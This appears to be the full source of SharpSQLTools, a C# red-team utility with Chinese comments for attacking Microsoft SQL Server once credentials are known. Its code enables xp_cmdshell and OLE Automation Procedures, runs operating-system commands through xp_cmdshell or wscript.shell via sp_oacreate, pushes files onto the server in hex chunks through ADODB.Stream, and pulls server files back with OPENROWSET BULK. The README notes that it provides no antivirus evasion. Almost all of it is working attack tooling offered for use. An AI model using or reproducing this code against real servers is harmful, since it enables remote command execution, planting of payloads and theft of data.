├── Image
    ├── blog_2021-06-19_13-51-03.png
    ├── blog_2021-06-19_13-52-10.png
    ├── blog_2021-06-19_13-52-44.png
    └── blog_2021-06-19_13-52-59.png
├── SharpSQLTools
    ├── app.config
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── FunModule
    │   ├── ExecOptions.cs
    │   ├── Batch.cs
    │   └── FilesOptions.cs
    ├── Domain
    │   └── Info.cs
    ├── SharpSQLTools.csproj
    ├── Program.cs
    └── Setting.cs
├── SharpSQLTools.sln
└── README.md


/Image/blog_2021-06-19_13-51-03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-51-03.png


--------------------------------------------------------------------------------
/Image/blog_2021-06-19_13-52-10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-52-10.png


--------------------------------------------------------------------------------
/Image/blog_2021-06-19_13-52-44.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-52-44.png


--------------------------------------------------------------------------------
/Image/blog_2021-06-19_13-52-59.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RowTeam/SharpSQLTools/HEAD/Image/blog_2021-06-19_13-52-59.png


--------------------------------------------------------------------------------
/SharpSQLTools/app.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <configuration>
3 | <startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></startup></configuration>
4 | 


--------------------------------------------------------------------------------
/SharpSQLTools.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2012
 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSQLTools", "SharpSQLTools\SharpSQLTools.csproj", "{A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Any CPU = Debug|Any CPU
 9 | 		Release|Any CPU = Release|Any CPU
10 | 	EndGlobalSection
11 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | 		{A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
13 | 		{A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Debug|Any CPU.Build.0 = Debug|Any CPU
14 | 		{A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Release|Any CPU.ActiveCfg = Release|Any CPU
15 | 		{A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}.Release|Any CPU.Build.0 = Release|Any CPU
16 | 	EndGlobalSection
17 | 	GlobalSection(SolutionProperties) = preSolution
18 | 		HideSolutionNode = FALSE
19 | 	EndGlobalSection
20 | EndGlobal
21 | 


--------------------------------------------------------------------------------
/SharpSQLTools/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // 有关程序集的常规信息通过以下
 6 | // 特性集控制。更改这些特性值可修改
 7 | // 与程序集关联的信息。
 8 | [assembly: AssemblyTitle("SharpSQLTools")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpSQLTools")]
13 | [assembly: AssemblyCopyright("Copyright ©  2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // 将 ComVisible 设置为 false 使此程序集中的类型
18 | // 对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型，
19 | // 则将该类型上的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 | 
22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("1a54c5fe-ffa6-43f1-a5eb-7a1897181076")]
24 | 
25 | // 程序集的版本信息由下面四个值组成:
26 | //
27 | //      主版本
28 | //      次版本 
29 | //      生成号
30 | //      修订号
31 | //
32 | // 可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值，
33 | // 方法是按如下所示使用“*”:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/SharpSQLTools/FunModule/ExecOptions.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Data;
 4 | using System.Data.SqlClient;
 5 | using System.Linq;
 6 | using System.Text;
 7 | 
 8 | namespace SharpSQLTools.FunModule
 9 | {
10 |     class ExecOptions
11 |     {
12 |         SqlConnection Conn;
13 |         Setting setting;
14 | 
15 |         public ExecOptions(SqlConnection Conn, Setting setting)
16 |         {
17 |             this.Conn = Conn;
18 |             this.setting = setting;
19 |         }
20 | 
21 |         /// <summary>
22 |         /// xp_cmdshell 执行命令
23 |         /// </summary>
24 |         /// <param name="Command">命令</param>
25 |         public void xp_cmdshell(String Command)
26 |         {
27 |             var sqlstr = $@"exec master..xp_cmdshell '{Command}'";
28 |             Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true));
29 |         }
30 | 
31 |         /// <summary>
32 |         /// sp_cmdshell 执行命令
33 |         /// </summary>
34 |         /// <param name="Command">命令</param>
35 |         public void sp_cmdshell(String Command)
36 |         {
37 |             if (setting.Check_configuration("Ole Automation Procedures", 0))
38 |             {
39 |                 if (setting.Enable_ola()) return;
40 |             }
41 |             var sqlstr = String.Format(@"
42 |                     declare @shell int,@exec int,@text int,@str varchar(8000); 
43 |                     exec sp_oacreate 'wscript.shell',@shell output 
44 |                     exec sp_oamethod @shell,'exec',@exec output,'c:\windows\system32\cmd.exe /c {0}'
45 |                     exec sp_oamethod @exec, 'StdOut', @text out;
46 |                     exec sp_oamethod @text, 'ReadAll', @str out
47 |                     select @str", Command);
48 |             Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true));
49 |         }
50 |     }
51 | }
52 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ### 简介
 2 | 
 3 | 需改版，就去看看 https://github.com/uknowsec/SharpSQLTools 的实现。
 4 | 
 5 | ##### 
 6 | 
 7 | ### Usage
 8 | 
 9 | ```
10 | λ SharpSQLTools.exe
11 | 
12 |    _____ _                      _____  ____  _   _______          _     
13 |   / ____| |                    / ____|/ __ \| | |__   __|        | |    
14 |  | (___ | |__   __ _ _ __ _ __| (___ | |  | | |    | | ___   ___ | |___ 
15 |   \___ \| '_ \ / _` | '__| '_ \\___ \| |  | | |    | |/ _ \ / _ \| / __|
16 |   ____) | | | | (_| | |  | |_) |___) | |__| | |____| | (_) | (_) | \__ \
17 |  |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
18 |                          | |                                            
19 |                          |_|                              
20 |                                                     by Rcoil & Uknow
21 | 
22 | SharpSQLTools target username password
23 | 
24 | Module:
25 |     enable_xp_cmdshell         - you know what it means
26 |     disable_xp_cmdshell        - you know what it means
27 |     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
28 |     enable_ole                 - you know what it means
29 |     disable_ole                - you know what it means
30 |     sp_cmdshell {cmd}          - executes cmd using sp_oacreate
31 |     upload {local} {remote}    - upload a local file to a remote path (OLE required)
32 |     download {remote} {local}  - download a remote file to a local path
33 |     exit                       - terminates the server process (and this session)"
34 | 
35 | ```
36 | 
37 | 
38 | 
39 | ### 20210627 添加 GUI
40 | 
41 | 我只是实现功能，不提供免杀。
42 | 
43 | ![blog_2021-06-19_13-51-03](./Image/blog_2021-06-19_13-51-03.png)
44 | 
45 | ![blog_2021-06-19_13-52-10](./Image/blog_2021-06-19_13-52-10.png)
46 | 
47 | ![blog_2021-06-19_13-52-44](./Image/blog_2021-06-19_13-52-44.png)
48 | 
49 | ![blog_2021-06-19_13-52-59](./Image/blog_2021-06-19_13-52-59.png)


--------------------------------------------------------------------------------
/SharpSQLTools/Domain/Info.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Linq;
 4 | using System.Text;
 5 | 
 6 | namespace SharpSQLTools.Domain
 7 | {
 8 |     class Info
 9 |     {
10 |         public static void ShowUsage()
11 |         {
12 |             ShowLogo();
13 |             ShowModuleUsage();
14 |         }
15 | 
16 |         public static void ShowModuleUsage()
17 |         {
18 |             Console.WriteLine(@"
19 | Module:
20 |     enable_xp_cmdshell         - you know what it means
21 |     disable_xp_cmdshell        - you know what it means
22 |     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
23 |     enable_ole                 - you know what it means
24 |     disable_ole                - you know what it means
25 |     sp_cmdshell {cmd}          - executes cmd using sp_oacreate
26 |     upload {local} {remote}    - upload a local file to a remote path (OLE required)
27 |     download {remote} {local}  - download a remote file to a local path
28 |     exit                       - terminates the server process (and this session)"
29 | );
30 |         }
31 | 
32 | 
33 |         public static void ShowLogo()
34 |         {
35 |             Console.WriteLine(@"
36 |    _____ _                      _____  ____  _   _______          _     
37 |   / ____| |                    / ____|/ __ \| | |__   __|        | |    
38 |  | (___ | |__   __ _ _ __ _ __| (___ | |  | | |    | | ___   ___ | |___ 
39 |   \___ \| '_ \ / _` | '__| '_ \\___ \| |  | | |    | |/ _ \ / _ \| / __|
40 |   ____) | | | | (_| | |  | |_) |___) | |__| | |____| | (_) | (_) | \__ \
41 |  |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
42 |                          | |                                            
43 |                          |_|                              
44 |                                                     by Rcoil & Uknow
45 | 
46 | SharpSQLTools target username password
47 | 
48 | ");
49 |         }
50 |     }
51 | }
52 | 


--------------------------------------------------------------------------------
/SharpSQLTools/FunModule/Batch.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Data;
 4 | using System.Data.SqlClient;
 5 | using System.IO;
 6 | using System.Linq;
 7 | using System.Text;
 8 | 
 9 | namespace SharpSQLTools.FunModule
10 | {
11 |     class Batch
12 |     {
13 |         public static string RemoteExec(SqlConnection Conn, String Command, Boolean Flag)
14 |         {
15 |             String value = String.Empty;
16 |             try
17 |             {
18 |                 //TODO:发送Command命令
19 |                 SqlCommand cmd = new SqlCommand();
20 |                 cmd.Connection = Conn;
21 | 
22 |                 //查询数据记录
23 |                 cmd.CommandText = Command;
24 |                 cmd.CommandType = CommandType.Text;
25 |                 using (SqlDataReader reader = cmd.ExecuteReader())
26 |                 {
27 |                     while (reader.Read())
28 |                     {
29 |                         if (Flag)
30 |                         {
31 |                             value += String.Format("\r\n{0}", reader[0].ToString());
32 |                         }
33 |                         else
34 |                         {
35 |                             value = reader[0].ToString();
36 |                         }
37 |                     }
38 |                 }
39 |                 return value;
40 |             }
41 |             catch (Exception ex)
42 |             {
43 |                 //Conn.Close();
44 |                 Console.WriteLine("[!] Error log: \r\n" + ex.Message);
45 |             }
46 |             return null;
47 |         }
48 | 
49 |         public static void CLRExec(SqlConnection Conn, String Command)
50 |         {
51 |             try
52 |             {
53 |                 //TODO:发送Command命令
54 |                 SqlCommand cmd = new SqlCommand();
55 |                 cmd.Connection = Conn;
56 | 
57 |                 //查询数据记录
58 |                 cmd.CommandText = Command;
59 |                 cmd.CommandType = CommandType.Text;
60 |                 cmd.ExecuteNonQuery();
61 |             }
62 |             catch (Exception ex)
63 |             {
64 |                 //Conn.Close();
65 |                 Console.WriteLine("[!] Error log: \r\n" + ex.Message);
66 |             }
67 |         }
68 |     }
69 | }
70 | 


--------------------------------------------------------------------------------
/SharpSQLTools/SharpSQLTools.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{A205AF7B-17E5-4AF3-B7D7-8E4EF22AA835}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <AppDesignerFolder>Properties</AppDesignerFolder>
10 |     <RootNamespace>SharpSQLTools</RootNamespace>
11 |     <AssemblyName>SharpSQLTools</AssemblyName>
12 |     <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
13 |     <FileAlignment>512</FileAlignment>
14 |     <TargetFrameworkProfile />
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |   </PropertyGroup>
26 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 |     <PlatformTarget>AnyCPU</PlatformTarget>
28 |     <DebugType>pdbonly</DebugType>
29 |     <Optimize>true</Optimize>
30 |     <OutputPath>bin\Release\</OutputPath>
31 |     <DefineConstants>TRACE</DefineConstants>
32 |     <ErrorReport>prompt</ErrorReport>
33 |     <WarningLevel>4</WarningLevel>
34 |   </PropertyGroup>
35 |   <ItemGroup>
36 |     <Reference Include="System" />
37 |     <Reference Include="System.Core" />
38 |     <Reference Include="System.Xml.Linq" />
39 |     <Reference Include="System.Data.DataSetExtensions" />
40 |     <Reference Include="Microsoft.CSharp" />
41 |     <Reference Include="System.Data" />
42 |     <Reference Include="System.Xml" />
43 |   </ItemGroup>
44 |   <ItemGroup>
45 |     <Compile Include="Domain\Info.cs" />
46 |     <Compile Include="FunModule\Batch.cs" />
47 |     <Compile Include="FunModule\ExecOptions.cs" />
48 |     <Compile Include="FunModule\FilesOptions.cs" />
49 |     <Compile Include="Program.cs" />
50 |     <Compile Include="Properties\AssemblyInfo.cs" />
51 |     <Compile Include="Setting.cs" />
52 |   </ItemGroup>
53 |   <ItemGroup>
54 |     <None Include="app.config" />
55 |   </ItemGroup>
56 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
57 |   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
58 |        Other similar extension points exist, see Microsoft.Common.targets.
59 |   <Target Name="BeforeBuild">
60 |   </Target>
61 |   <Target Name="AfterBuild">
62 |   </Target>
63 |   -->
64 | </Project>


--------------------------------------------------------------------------------
/SharpSQLTools/Program.cs:
--------------------------------------------------------------------------------
  1 | using SharpSQLTools.Domain;
  2 | using SharpSQLTools.FunModule;
  3 | 
  4 | using System;
  5 | using System.Collections;
  6 | using System.Collections.Generic;
  7 | using System.Data;
  8 | using System.Data.SqlClient;
  9 | using System.IO;
 10 | using System.Linq;
 11 | using System.Threading;
 12 | 
 13 | namespace SharpSQLTools
 14 | {
 15 |     class Program
 16 |     {
 17 |         public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
 18 |         {
 19 |             var value = String.Empty;
 20 |             foreach (SqlError err in args.Errors)
 21 |             {
 22 |                 value = err.Message;
 23 |                 Console.WriteLine(value);
 24 |             }
 25 |         }
 26 | 
 27 |         /// <summary>
 28 |         /// 数据库连接
 29 |         /// </summary>
 30 |         static SqlConnection SqlConnet(string target, string username, string password)
 31 |         {
 32 |             SqlConnection Conn = null;
 33 |             var connectionString = $"Server = \"{target}\";Database = \"master\";User ID = \"{username}\";Password = \"{password}\";";
 34 |             try
 35 |             {
 36 |                 Conn = new SqlConnection(connectionString);
 37 |                 Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
 38 |                 Conn.Open();
 39 |                 Console.WriteLine("[*] Database connection is successful!");
 40 |             }
 41 |             catch (Exception ex)
 42 |             {
 43 |                 Console.WriteLine("[!] Error log: \r\n" + ex.Message);
 44 |                 Environment.Exit(0);
 45 |             }
 46 |             return Conn;
 47 |         }
 48 | 
 49 |         static void Main(string[] args)
 50 |         {
 51 |             if (args.Length != 3)
 52 |             {
 53 |                 Info.ShowUsage();                
 54 |                 return;
 55 |             }
 56 | 
 57 |             var Conn = SqlConnet(args[0], args[1], args[2]);
 58 |             var setting = new Setting(Conn);
 59 |             var filesOptions = new FilesOptions(Conn, setting);
 60 |             var execOptions = new ExecOptions(Conn, setting);
 61 | 
 62 |             try
 63 |             {
 64 |                 do
 65 |                 {
 66 |                     Console.Write("SQL> ");
 67 |                     string str = Console.ReadLine();
 68 |                     if (str.ToLower() == "exit") { Conn.Close(); break; }
 69 |                     else if (str.ToLower() == "help") { Info.ShowModuleUsage(); continue; }
 70 |                     
 71 |                     string[] cmdline = str.Split(new char[] { ' ' }, 3);
 72 |                     String s = String.Empty;
 73 |                     for (int i = 1; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
 74 | 
 75 |                     switch (cmdline[0].ToLower())
 76 |                     {
 77 |                         case "enable_xp_cmdshell":
 78 |                             setting.Enable_xp_cmdshell();
 79 |                             break;
 80 |                         case "disable_xp_cmdshell":
 81 |                             setting.Disable_xp_cmdshell();
 82 |                             break;
 83 |                         case "xp_cmdshell":
 84 |                             execOptions.xp_cmdshell(s);
 85 |                             break;
 86 |                         case "enable_ole":
 87 |                             setting.Enable_ola();
 88 |                             break;
 89 |                         case "disable_ole":
 90 |                             setting.Disable_ole();
 91 |                             break;
 92 |                         case "sp_cmdshell":
 93 |                             execOptions.sp_cmdshell(s);
 94 |                             break;
 95 |                         case "upload":
 96 |                             filesOptions.UploadFiles(cmdline[1], cmdline[2]);
 97 |                             break;
 98 |                         case "download":
 99 |                             filesOptions.DownloadFiles(cmdline[2], cmdline[1]);
100 |                             break;
101 |                         default:
102 |                             Console.WriteLine(Batch.RemoteExec(Conn, str, true));
103 |                             break;
104 |                     }
105 |                     if (!ConnectionState.Open.Equals(Conn.State))
106 |                     {
107 |                         Console.WriteLine("[!] Disconnect....");
108 |                         break;
109 |                     }
110 |                 }
111 |                 while (true);
112 |             }
113 |             catch (Exception ex)
114 |             {
115 |                 Conn.Close();
116 |                 Console.WriteLine("[!] Error log: \r\n" + ex.Message);
117 |             }
118 |         }
119 |     }
120 | }
121 | 


--------------------------------------------------------------------------------
/SharpSQLTools/Setting.cs:
--------------------------------------------------------------------------------
  1 | using SharpSQLTools.FunModule;
  2 | 
  3 | using System;
  4 | using System.Collections.Generic;
  5 | using System.Data.SqlClient;
  6 | using System.Linq;
  7 | using System.Text;
  8 | 
  9 | namespace SharpSQLTools
 10 | {
 11 |     class Setting
 12 |     {
 13 |         private String Command = String.Empty;
 14 |         public SqlConnection Conn = null;
 15 |         public Setting(SqlConnection Connection)
 16 |         {
 17 |             Conn = Connection;
 18 |         }
 19 | 
 20 |         /// <summary>
 21 |         /// 判断文件是否存在
 22 |         /// </summary>
 23 |         public bool File_Exists(String path)
 24 |         {
 25 |             Command = String.Format(@"
 26 | DECLARE @r INT
 27 | EXEC master.dbo.xp_fileexist '{0}', @r OUTPUT
 28 | SELECT @r as n", path);          
 29 |             if (int.Parse(Batch.RemoteExec(Conn, Command, false)) == 1)
 30 |                 return true;
 31 |             return false;
 32 |         }
 33 | 
 34 |         /// <summary>
 35 |         /// 设置 configuration
 36 |         /// </summary>
 37 |         public bool Set_configuration(String option, int value)
 38 |         {
 39 |             Command = String.Format("exec master.dbo.sp_configure '{0}',{1}; RECONFIGURE;", option, value);
 40 |             Batch.RemoteExec(Conn, Command, false);
 41 |             return Check_configuration(option, value);
 42 |         }
 43 | 
 44 |         /// <summary>
 45 |         /// 检查 configuration 的配置
 46 |         /// </summary>
 47 |         public bool Check_configuration(String option, int value)
 48 |         {
 49 |             Command = String.Format("SELECT cast(value as INT) as v FROM sys.configurations where name = '{0}';", option);            
 50 |             if (int.Parse(Batch.RemoteExec(Conn, Command, false)) == value)
 51 |                 return true;
 52 |             return false;
 53 |         }
 54 | 
 55 |         #region 启用/关闭 OLE Automation Procedures 配置
 56 |        
 57 |         /// <summary>
 58 |         /// 开启 OLA
 59 |         /// </summary>
 60 |         public bool Enable_ola()
 61 |         {
 62 |             if (!Set_configuration("show advanced options", 1))
 63 |             {
 64 |                 Console.WriteLine("[!] cannot enable 'show advanced options'");
 65 |                 return false;
 66 |             }
 67 |             if (!Set_configuration("Ole Automation Procedures", 1))
 68 |             {
 69 |                 Console.WriteLine("[!] cannot enable 'Ole Automation Procedures'");
 70 |                 return false;
 71 |             }
 72 |             return true;
 73 |         }
 74 | 
 75 |         /// <summary>
 76 |         /// 关闭 OLA
 77 |         /// </summary>
 78 |         public bool Disable_ole()
 79 |         {
 80 |             if (!Set_configuration("show advanced options", 1))
 81 |             {
 82 |                 Console.WriteLine("[!] cannot enable 'show advanced options'");
 83 |                 return false;
 84 |             }
 85 |             if (!Set_configuration("Ole Automation Procedures", 0))
 86 |             {
 87 |                 Console.WriteLine("[!] cannot disable 'Ole Automation Procedures'");
 88 |                 return false;
 89 |             }
 90 |             if (!Set_configuration("show advanced options", 0))
 91 |             {
 92 |                 Console.WriteLine("[!] cannot disable 'show advanced options'");
 93 |                 return false;
 94 |             }
 95 |             return true;
 96 |         }
 97 | 
 98 |         #endregion
 99 | 
100 | 
101 |         #region 启用/关闭 xp_cmdshell
102 |         /// <summary>
103 |         /// 开启 xp_cmdshell
104 |         /// </summary>
105 |         public bool Enable_xp_cmdshell()
106 |         {
107 |             if (!Set_configuration("show advanced options", 1))
108 |             {
109 |                 Console.WriteLine("[!] cannot enable 'show advanced options'");
110 |                 return false;
111 |             }
112 |             if (!Set_configuration("xp_cmdshell", 1))
113 |             {
114 |                 Console.WriteLine("[!] cannot enable 'xp_cmdshell'");
115 |                 return false;
116 |             }
117 |             return true;
118 |         }
119 | 
120 |         /// <summary>
121 |         /// 关闭 xp_cmdshell
122 |         /// </summary>
123 |         public bool Disable_xp_cmdshell()
124 |         {
125 |             if (!Set_configuration("show advanced options", 1))
126 |             {
127 |                 Console.WriteLine("[!] cannot enable 'show advanced options'");
128 |                 return false;
129 |             }
130 |             if (!Set_configuration("xp_cmdshell", 0))
131 |             {
132 |                 Console.WriteLine("[!] cannot disable 'xp_cmdshell'");
133 |                 return false;
134 |             }
135 |             if (!Set_configuration("show advanced options", 0))
136 |             {
137 |                 Console.WriteLine("[!] cannot disable 'show advanced options'");
138 |                 return false;
139 |             }
140 |             return true;
141 |         }
142 | 
143 |         #endregion
144 | 
145 |     }
146 | }
147 | 


--------------------------------------------------------------------------------
/SharpSQLTools/FunModule/FilesOptions.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections;
  3 | using System.Data.SqlClient;
  4 | using System.IO;
  5 | using System.Linq;
  6 | using System.Threading;
  7 | 
  8 | namespace SharpSQLTools.FunModule
  9 | {
 10 |     /// <summary>
 11 |     /// 文件上传下载类
 12 |     /// </summary>
 13 |     class FilesOptions
 14 |     {
 15 |         SqlConnection Conn;
 16 |         Setting setting;
 17 |         String sqlstr;
 18 | 
 19 |         public FilesOptions(SqlConnection Conn, Setting setting)
 20 |         {
 21 |             this.Conn = Conn;
 22 |             this.setting = setting;
 23 |         }
 24 | 
 25 |         /// <summary>
 26 |         ///  把字符串按照指定长度分割
 27 |         /// </summary>
 28 |         /// <param name="txtString">字符串</param>
 29 |         /// <param name="charNumber">长度</param>
 30 |         /// <returns></returns>
 31 |         private ArrayList GetSeparateSubString(string txtString, int charNumber)
 32 |         {
 33 |             ArrayList arrlist = new ArrayList();
 34 |             string tempStr = txtString;
 35 |             for (int i = 0; i < tempStr.Length; i += charNumber)
 36 |             {
 37 |                 if ((tempStr.Length - i) > charNumber)//如果是，就截取
 38 |                 {
 39 |                     arrlist.Add(tempStr.Substring(i, charNumber));
 40 |                 }
 41 |                 else
 42 |                 {
 43 |                     arrlist.Add(tempStr.Substring(i));//如果不是，就截取最后剩下的那部分
 44 |                 }
 45 |             }
 46 |             return arrlist;
 47 |         }
 48 | 
 49 |         /// <summary>
 50 |         /// 文件上传，使用 OLE Automation Procedures 的 ADODB.Stream
 51 |         /// </summary>
 52 |         /// <param name="localFile">本地文件</param>
 53 |         /// <param name="RemoteFile">远程文件</param>
 54 |         public void UploadFiles(String localFile, String remoteFile)
 55 |         {
 56 |             Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));
 57 | 
 58 |             if (setting.Check_configuration("Ole Automation Procedures", 0))
 59 |             {
 60 |                 if (setting.Enable_ola()) return;
 61 |             }
 62 | 
 63 |             int count = 0;
 64 |             try
 65 |             {
 66 |                 string hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2")));
 67 | 
 68 |                 ArrayList arrlist = GetSeparateSubString(hexString, 150000);
 69 | 
 70 |                 foreach (string hex150000 in arrlist)
 71 |                 {
 72 |                     count++;
 73 |                     string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count);
 74 | 
 75 |                     sqlstr = String.Format(@"
 76 |                         DECLARE @ObjectToken INT
 77 |                         EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
 78 |                         EXEC sp_OASetProperty @ObjectToken, 'Type', 1
 79 |                         EXEC sp_OAMethod @ObjectToken, 'Open'
 80 |                         EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0}
 81 |                         EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2
 82 |                         EXEC sp_OAMethod @ObjectToken, 'Close'
 83 |                         EXEC sp_OADestroy @ObjectToken", hex150000, filePath);
 84 | 
 85 |                     Batch.RemoteExec(Conn, sqlstr, false);
 86 |                     if (setting.File_Exists(filePath))
 87 |                     {
 88 |                         Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count);
 89 |                     }
 90 |                     else
 91 |                     {
 92 |                         Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count);
 93 |                         Conn.Close();
 94 |                         Environment.Exit(0);
 95 |                     }
 96 | 
 97 |                     Thread.Sleep(5000);
 98 |                 }
 99 | 
100 |                 string shell = String.Format(@"
101 |                     DECLARE @SHELL INT 
102 |                     EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT 
103 |                     EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");
104 | 
105 |                 sqlstr = "copy /b ";
106 |                 for (int i = 1; i < count + 1; i++)
107 |                 {
108 |                     if (i != count)
109 |                     {
110 |                         sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i);
111 |                     }
112 |                     else
113 |                     {
114 |                         sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i);
115 |                     }
116 |                 }
117 | 
118 |                 Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
119 |                 Batch.RemoteExec(Conn, shell + sqlstr, false);
120 |                 Thread.Sleep(5000);
121 | 
122 |                 sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
123 |                 Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
124 |                 Batch.RemoteExec(Conn, shell + sqlstr, false);
125 | 
126 |                 if (setting.File_Exists(remoteFile))
127 |                 {
128 |                     Console.WriteLine("[*] '{0}' Upload completed", localFile);
129 |                 }
130 |             }
131 |             catch (Exception ex)
132 |             {
133 |                 Conn.Close();
134 |                 Console.WriteLine("[!] Error log: \r\n" + ex.Message);
135 |             }
136 |         }
137 | 
138 |         /// <summary>
139 |         /// 文件下载，使用 OPENROWSET + BULK。将 memoryStream 直接写入文件
140 |         /// </summary>
141 |         /// <param name="remoteFile">远程文件</param>
142 |         /// <param name="localFile">本地文件</param>
143 |         public void DownloadFiles(String localFile, String remoteFile)
144 |         {
145 |             Console.WriteLine(String.Format("[*] Downloading '{0}' to '{1}'...", remoteFile, localFile));
146 | 
147 |             if (!setting.File_Exists(remoteFile))
148 |             {
149 |                 Console.WriteLine("[!] {0} file does not exist....", remoteFile);
150 |                 return;
151 |             }
152 | 
153 |             sqlstr = String.Format(@"SELECT * FROM OPENROWSET(BULK N'{0}', SINGLE_BLOB) rs", remoteFile); // SINGLE_BLOB 选项将它们读取为二进制文件
154 |             SqlCommand sqlComm = new SqlCommand(sqlstr, Conn);
155 | 
156 |             //接收查询到的sql数据
157 |             using (SqlDataReader reader = sqlComm.ExecuteReader())
158 |             {
159 |                 //读取数据 
160 |                 while (reader.Read())
161 |                 {
162 |                     using (MemoryStream memoryStream = new MemoryStream((byte[])reader[0]))
163 |                     {
164 |                         using (FileStream fileStream = new FileStream(localFile, FileMode.Create, FileAccess.Write))
165 |                         {
166 |                             byte[] bytes = new byte[memoryStream.Length];
167 |                             memoryStream.Read(bytes, 0, (int)memoryStream.Length);
168 |                             fileStream.Write(bytes, 0, bytes.Length);
169 |                         }
170 |                     }
171 |                 }
172 |             }
173 | 
174 |             Console.WriteLine("[*] '{0}' Download completed", remoteFile);
175 |         }
176 |     }
177 | }
178 | 


--------------------------------------------------------------------------------